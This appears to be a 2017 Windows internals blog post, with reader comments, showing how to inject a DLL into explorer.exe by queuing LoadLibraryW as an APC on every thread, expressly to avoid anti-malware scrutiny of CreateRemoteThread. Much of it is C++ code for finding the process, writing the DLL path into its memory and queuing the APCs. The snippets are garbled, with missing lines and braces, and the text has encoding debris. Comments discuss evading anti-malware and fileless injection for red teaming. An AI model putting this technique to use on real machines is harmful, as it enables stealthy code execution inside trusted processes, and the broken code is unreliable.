Injecting a DLL without a Remote Thread

March 14, 2017


A well-known technique for injecting a DLL into another process involves using the CreateRemoteThread(Ex) function to create a thread in another process and point the thread function to the LoadLibraryA or LoadLibraryW, since these functions have the same signature (on the binary level) as a thread function. Before calling CreateRemoteThread, the caller uses VirtualAllocEx to allocate some memory to hold the path to the DLL. This technique is simple and reliable, but has a couple of drawbacks:

  1. 1. The target process must be opened with a relatively broad access mask that includes PROCESS_CREATE_THREAD.
  2. 2. Anti-malware agents typically watch closely CreateRemoteThread attempts and will be alerted to it, since most processes should not need such an operation. The canonical scenario for CreateRemoteThread is for a debugger to inject a thread into its debuggee and then trigger a breakpoint, forcing a break-in into the process.

Another technique that could be used to inject a DLL without creating any remote thread is to use an Asynchronous Procedure Calls (APC). An APC is an object that wraps a function that is targeted at a particular thread. If we can somehow attach an APC to a thread running in the target process, we may be able to “force” that thread to load our DLL. There’s one snag with this approach, which we’ll get to in a moment.

Let’s say we want to inject our DLL into Explorer.exe, since it’s likely to exist, and code running from explorer is somewhat “trusted” by users. First, we need to locate Explorer, and then decide to which thread to attach our APC. Although we can try picking a random thread inside explorer, we can even do this to all threads in explorer. Why? Because a user mode APC (which is what we can use in user mode) cannot force the target to execute it (that’s the “snag”). For a thread to execute its APCs, it must enter an “alertable” state, which can be achieved with several functions: SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx and MsgWaitForMultipleObjectsEx. The waiting in these functions can be configured to be alertable, so that APCs are able to run.

Let’s start by searching for a target process given its EXE name and getting back its ID and a list of threads:

bool FindProcess(PCWSTR exeName, DWORD& pid, vector<DWORD>& tids) {
    auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return false;

    pid = 0;

    PROCESSENTRY32 pe = { sizeof(pe) };
    if (::Process32First(hSnapshot, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, exeName) == 0) {
                pid = pe.th32ProcessID;
                THREADENTRY32 te = { sizeof(te) };
                if (::Thread32First(hSnapshot, &te)) {
                    do {
                        if (te.th32OwnerProcessID == pid) {
                    } while (::Thread32Next(hSnapshot, &te));
        } while (::Process32Next(hSnapshot, &pe));

    return pid > 0 && !tids.empty();

The function uses the toolhelp functions to enumerate processes and threads, returning a process ID and a vector of thread IDs.

Now that have a process and its threads, we can try to inject an APC to each thread using QueueUserAPC. The first step is opening a process handle capable of writing to the target process address space:

DWORD pid;
vector<DWORD> tids;
if (FindProcess(L"explorer.exe", pid, tids)) {

Notice that PROCESS_CREATE_THREAD access right is not required. If the handle turns back ok, we can move to the real work. Next, we allocate a buffer inside the process and copy our DLL’s full path into the buffer:

auto p = ::VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
wchar_t buffer[] = L"g:\\temp\\MyLibrary.Dll";
::WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), nullptr);
  1. Now we can loop on all threads, obtain a handle for each and queue an APC:
    for (const auto& tid : tids) {
        HANDLE hThread = ::OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
        if (hThread) {
            ::QueueUserAPC((PAPCFUNC)::GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"), hThread, (ULONG_PTR)p);
    ::VirtualFreeEx(hProcess, p, 0, MEM_RELEASE | MEM_DECOMMIT);

(of course we should close each thread handle and finally the process handle as well).

We target the APC to the LoadLibraryW function, because again, it’s prototype is almost the same as any APC โ€“ the only real difference is the APC function does not return anything, but we don’t care. Once our DLL loads, its DllMain can do anything, like create a local thread and do whatever work we want Explorer.

Targeting the APC to all threads increases the chance of the DLL loading, because it’s likely some thread will enter an alertable wait state. Since a DLL cannot be loaded multiple times, there’s no harm in that. Here’s my DLL inside Explorer.Exe:


Add comment
facebook linkedin twitter email

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>



  1. Michael GrabelkovskyMarch 20, 2017 ื‘ 10:51

    Really interesting.

    But by this way is impossible to get over Anti-Malware protection if you want, instrument, for example, Services.exe.

    I’ve used kernel base instrumentation technique and found the way how to get over antimalware protection too. ๐Ÿ™‚
    See example:

  2. arekfurtApril 10, 2017 ื‘ 04:24

    This is really, really interesting to someone (ie. myself) who is trying to deepen their understanding of how inter-process DLL injection can occur in Windows without using CreateRemoteThread. The step-by-step analysis with example code is especially helpful. Thanks.

    One question, if you happen across this comment: other uses of QueueUserAPC I’ve seen to this point have required that a new process be started right off the bat, with the OueueUserAPC call then being used in a kind of process hollowing approach. (Similar to what many versions of Hancitor malware do with process hollowing, if memory serves.). This doesn’t. Does that fact have anything to do with the fact that when you allocate the buffer inside the target process you name a DLL file that’s on disk as opposed to copying in-memory code from your source process to the buffer? To put that in other, more practical terms, could this approach be altered to use a DLL you want to inject without actually needing to download a file to disk first?

    A DLL injection method that doesn’t require using CreateRemoteThread, allows injection into an existing process, and doesn’t require writing anything to disk would be a very nice edition to a pen test/red teaming toolkit. ๐Ÿ™‚